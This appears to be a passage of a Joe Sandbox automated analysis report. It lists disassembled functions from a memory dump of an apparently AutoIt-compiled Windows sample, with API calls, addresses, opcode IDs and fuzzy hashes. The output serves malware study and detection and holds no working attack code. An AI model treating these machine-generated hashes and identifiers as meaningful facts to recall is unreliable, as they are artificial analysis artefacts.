                                                                                                                  • Instruction Fuzzy Hash: ED51B070A0064ADBDF21CF68E888BEDBBF5AF05318F584119E8579B298D3709944CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00D8B1C1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8B225
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D8B242
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D8B253
                                                                                                                  • EndPaint.USER32(?,?), ref: 00D8B29D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1827037458-0
                                                                                                                  • Opcode ID: da151ca23b0b0f45da1f82612fc176f3f4871b5bafdfe684c4e1f0efb4158ae8
                                                                                                                  • Instruction ID: f730718540de6c41121457102cfa5125d7d29fe57d34678aa3e9ed69b3aeeae8
                                                                                                                  • Opcode Fuzzy Hash: da151ca23b0b0f45da1f82612fc176f3f4871b5bafdfe684c4e1f0efb4158ae8
                                                                                                                  • Instruction Fuzzy Hash: 1041AB70100304AFC711EF29DC88FBA7BE9EB59730F04066AF9A5962A1C7319849DB75
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00E31810,00000000,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE21B
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00DDE23F
                                                                                                                  • ShowWindow.USER32(00E31810,00000000,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE29F
                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE2B1
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00DDE2D5
                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DDE2F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  • Opcode ID: 527850a6e0891c00f6d20b2ffe238669315dbd542a578e74ac2a869f443c7bfd
                                                                                                                  • Instruction ID: 6f1bf3201630d8bc40926e3535089e4bc3413b8fea7c6d9b8af5527b59daedac
                                                                                                                  • Opcode Fuzzy Hash: 527850a6e0891c00f6d20b2ffe238669315dbd542a578e74ac2a869f443c7bfd
                                                                                                                  • Instruction Fuzzy Hash: AF415334601145EFDB15DF14C899B947FE9BB06314F1C82BAEA588F3A2C731A841CBB5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                    • Part of subcall function 00D8B58B: BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DDE9F2
                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00DDEA06
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DDEA14
                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00DDEA24
                                                                                                                  • EndPath.GDI32(00000000), ref: 00DDEA34
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00DDEA44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 43455801-0
                                                                                                                  • Opcode ID: a053f20391e46d104eaf8e54ec925fed00a26d9572a09d39b8874f3c9714a3d4
                                                                                                                  • Instruction ID: b70b8927358ca374b9cf5fd697956ddeac443ba6475ff5b619c434e363d1235a
                                                                                                                  • Opcode Fuzzy Hash: a053f20391e46d104eaf8e54ec925fed00a26d9572a09d39b8874f3c9714a3d4
                                                                                                                  • Instruction Fuzzy Hash: F311DB7600024DBFDF129F91DC88EAA7FAEEB08354F048056FE1999260D7719D55DBB0
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00DAEFB6
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DAEFC7
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DAEFCE
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00DAEFD6
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DAEFED
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00DAEFFF
                                                                                                                    • Part of subcall function 00DAA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00DAA79D,00000000,00000000,?,00DAAB73), ref: 00DAB2CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 603618608-0
                                                                                                                  • Opcode ID: 03ecf786864153b846b3d51d42857fcfcd12a2cdf3625fda6f35ee3a27b56e70
                                                                                                                  • Instruction ID: 553794c40f9c15dbc87c1a1271999c572979ec6e38d0b9674574f63e2699a5f8
                                                                                                                  • Opcode Fuzzy Hash: 03ecf786864153b846b3d51d42857fcfcd12a2cdf3625fda6f35ee3a27b56e70
                                                                                                                  • Instruction Fuzzy Hash: C1017175A00309BFEB109BA69C49A5EBFBAEF49351F048066FA04EB380D6709C01CB71
                                                                                                                  APIs
                                                                                                                  • __init_pointers.LIBCMT ref: 00D987D7
                                                                                                                    • Part of subcall function 00D91E5A: __initp_misc_winsig.LIBCMT ref: 00D91E7E
                                                                                                                    • Part of subcall function 00D91E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D98BE1
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D98BF5
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D98C08
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D98C1B
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D98C2E
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D98C41
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D98C54
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D98C67
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D98C7A
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D98C8D
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D98CA0
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D98CB3
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D98CC6
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D98CD9
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D98CEC
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D98CFF
                                                                                                                  • __mtinitlocks.LIBCMT ref: 00D987DC
                                                                                                                    • Part of subcall function 00D98AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00E2AC68,00000FA0,?,?,00D987E1,00D96AFA,00E267D8,00000014), ref: 00D98AD1
                                                                                                                  • __mtterm.LIBCMT ref: 00D987E5
                                                                                                                    • Part of subcall function 00D9884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00D989CF
                                                                                                                    • Part of subcall function 00D9884D: _free.LIBCMT ref: 00D989D6
                                                                                                                    • Part of subcall function 00D9884D: RtlDeleteCriticalSection.NTDLL(00E2AC68), ref: 00D989F8
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9880A
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D98833
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2942034483-0
                                                                                                                  • Opcode ID: e932b06750caf6f3cd20be81138e15b57d7ea06dd168a47feb686e8b9c79fb8a
                                                                                                                  • Instruction ID: 438c380cc286b0ae3b34412f45ceb7ce48e892b8444fa4ae360fc91141502008
                                                                                                                  • Opcode Fuzzy Hash: e932b06750caf6f3cd20be81138e15b57d7ea06dd168a47feb686e8b9c79fb8a
                                                                                                                  • Instruction Fuzzy Hash: F7F0E9331197115EEF7877B8BC0764A2AC0DF03F30B680A2AF464D50E2FF1088416170
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423608774-0
                                                                                                                  • Opcode ID: 4e19434cc251bdd979f0fe67dcee056fc04613a359e916b642e2a0397f066d9d
                                                                                                                  • Instruction ID: fe7ebeb5f953cfdb38f8505a902ae689c8a149842146cbbcace9c3bf46610519
                                                                                                                  • Opcode Fuzzy Hash: 4e19434cc251bdd979f0fe67dcee056fc04613a359e916b642e2a0397f066d9d
                                                                                                                  • Instruction Fuzzy Hash: EF018132101311EBD7152B98ED48EFF7BABFF8A702B444529F503D22A1CB64A801CBB1
                                                                                                                  APIs
                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71898
                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D718A0
                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D718AB
                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D718B6
                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D718BE
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D718C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4278518827-0
                                                                                                                  • Opcode ID: 76aad8411a286c1bacac767c3b5b30a96854867f69a8bff389490eaf9a66c760
                                                                                                                  • Instruction ID: 88c5f6b26b33c1b646da49c462e6cbd3afcd914d5b33a76f373347f5142bf372
                                                                                                                  • Opcode Fuzzy Hash: 76aad8411a286c1bacac767c3b5b30a96854867f69a8bff389490eaf9a66c760
                                                                                                                  • Instruction Fuzzy Hash: F00144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DB8504
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DB851A
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00DB8529
                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8538
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8542
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8549
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839392675-0
                                                                                                                  • Opcode ID: 7d20167064ad88526870e4515b39e8946ec5638d021329c58cf26cbda1df7d8a
                                                                                                                  • Instruction ID: ef1133b4ab874ecf808e14a6698a2d42410381dd8dc36b7c59cd1c43793495db
                                                                                                                  • Opcode Fuzzy Hash: 7d20167064ad88526870e4515b39e8946ec5638d021329c58cf26cbda1df7d8a
                                                                                                                  • Instruction Fuzzy Hash: A5F03A72640298BBE7215B62AD0EEFF7A7EDFC6B15F004058FA05D1250EBA06A01D6B5
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00DBA330
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DBA341
                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DBA34E
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DBA35B
                                                                                                                    • Part of subcall function 00DB9CCE: CloseHandle.KERNEL32(?,?,00DBA368,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DB9CD8
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DBA36E
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DBA375
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3495660284-0
                                                                                                                  • Opcode ID: 40dee8691daf9fdd710bfa92f3181ed10ca33a7e6ab6a0460a9bfaf41e197332
                                                                                                                  • Instruction ID: c01a4efe0d7e526252a29e9939c8ecb53fc42e8fccc37afced2a6dc4c235b2fb
                                                                                                                  • Opcode Fuzzy Hash: 40dee8691daf9fdd710bfa92f3181ed10ca33a7e6ab6a0460a9bfaf41e197332
                                                                                                                  • Instruction Fuzzy Hash: 49F05E32141311EBD3112BA8ED48EEF7BBBEF89302B044521F203D12A1CBB59851CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00D7BBD9: _memmove.LIBCMT ref: 00D7BC33
                                                                                                                  • __swprintf.LIBCMT ref: 00D8D98F
                                                                                                                  Strings
                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D8D832
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                  • Opcode ID: 76a85bbe3ac3d9e4d081031d6861b84bf4df1c573fe5a2d8c90db75bbdb71416
                                                                                                                  • Instruction ID: 5818c6c658c68557287a22fb9c6c0f5d41417c835431f5c6c7107bc9d1444367
                                                                                                                  • Opcode Fuzzy Hash: 76a85bbe3ac3d9e4d081031d6861b84bf4df1c573fe5a2d8c90db75bbdb71416
                                                                                                                  • Instruction Fuzzy Hash: 55914731108341AFC715FF25C886D6EBBA6EF85700F14891DF99A972A1EB60ED04CB76
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB4A8
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DCB5B7
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB73A
                                                                                                                    • Part of subcall function 00DBA6F6: VariantInit.OLEAUT32(00000000), ref: 00DBA736
                                                                                                                    • Part of subcall function 00DBA6F6: VariantCopy.OLEAUT32(?,?), ref: 00DBA73F
                                                                                                                    • Part of subcall function 00DBA6F6: VariantClear.OLEAUT32(?), ref: 00DBA74B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                  • Opcode ID: df216f4828c0cc63b8acec5fbaf1d3b2b68d1dc010e1cc91a938d8f29c857d15
                                                                                                                  • Instruction ID: c500ccc09ce06f3be12d24c81a15a14b5f7892b2a8bbe97259bee062ab190f10
                                                                                                                  • Opcode Fuzzy Hash: df216f4828c0cc63b8acec5fbaf1d3b2b68d1dc010e1cc91a938d8f29c857d15
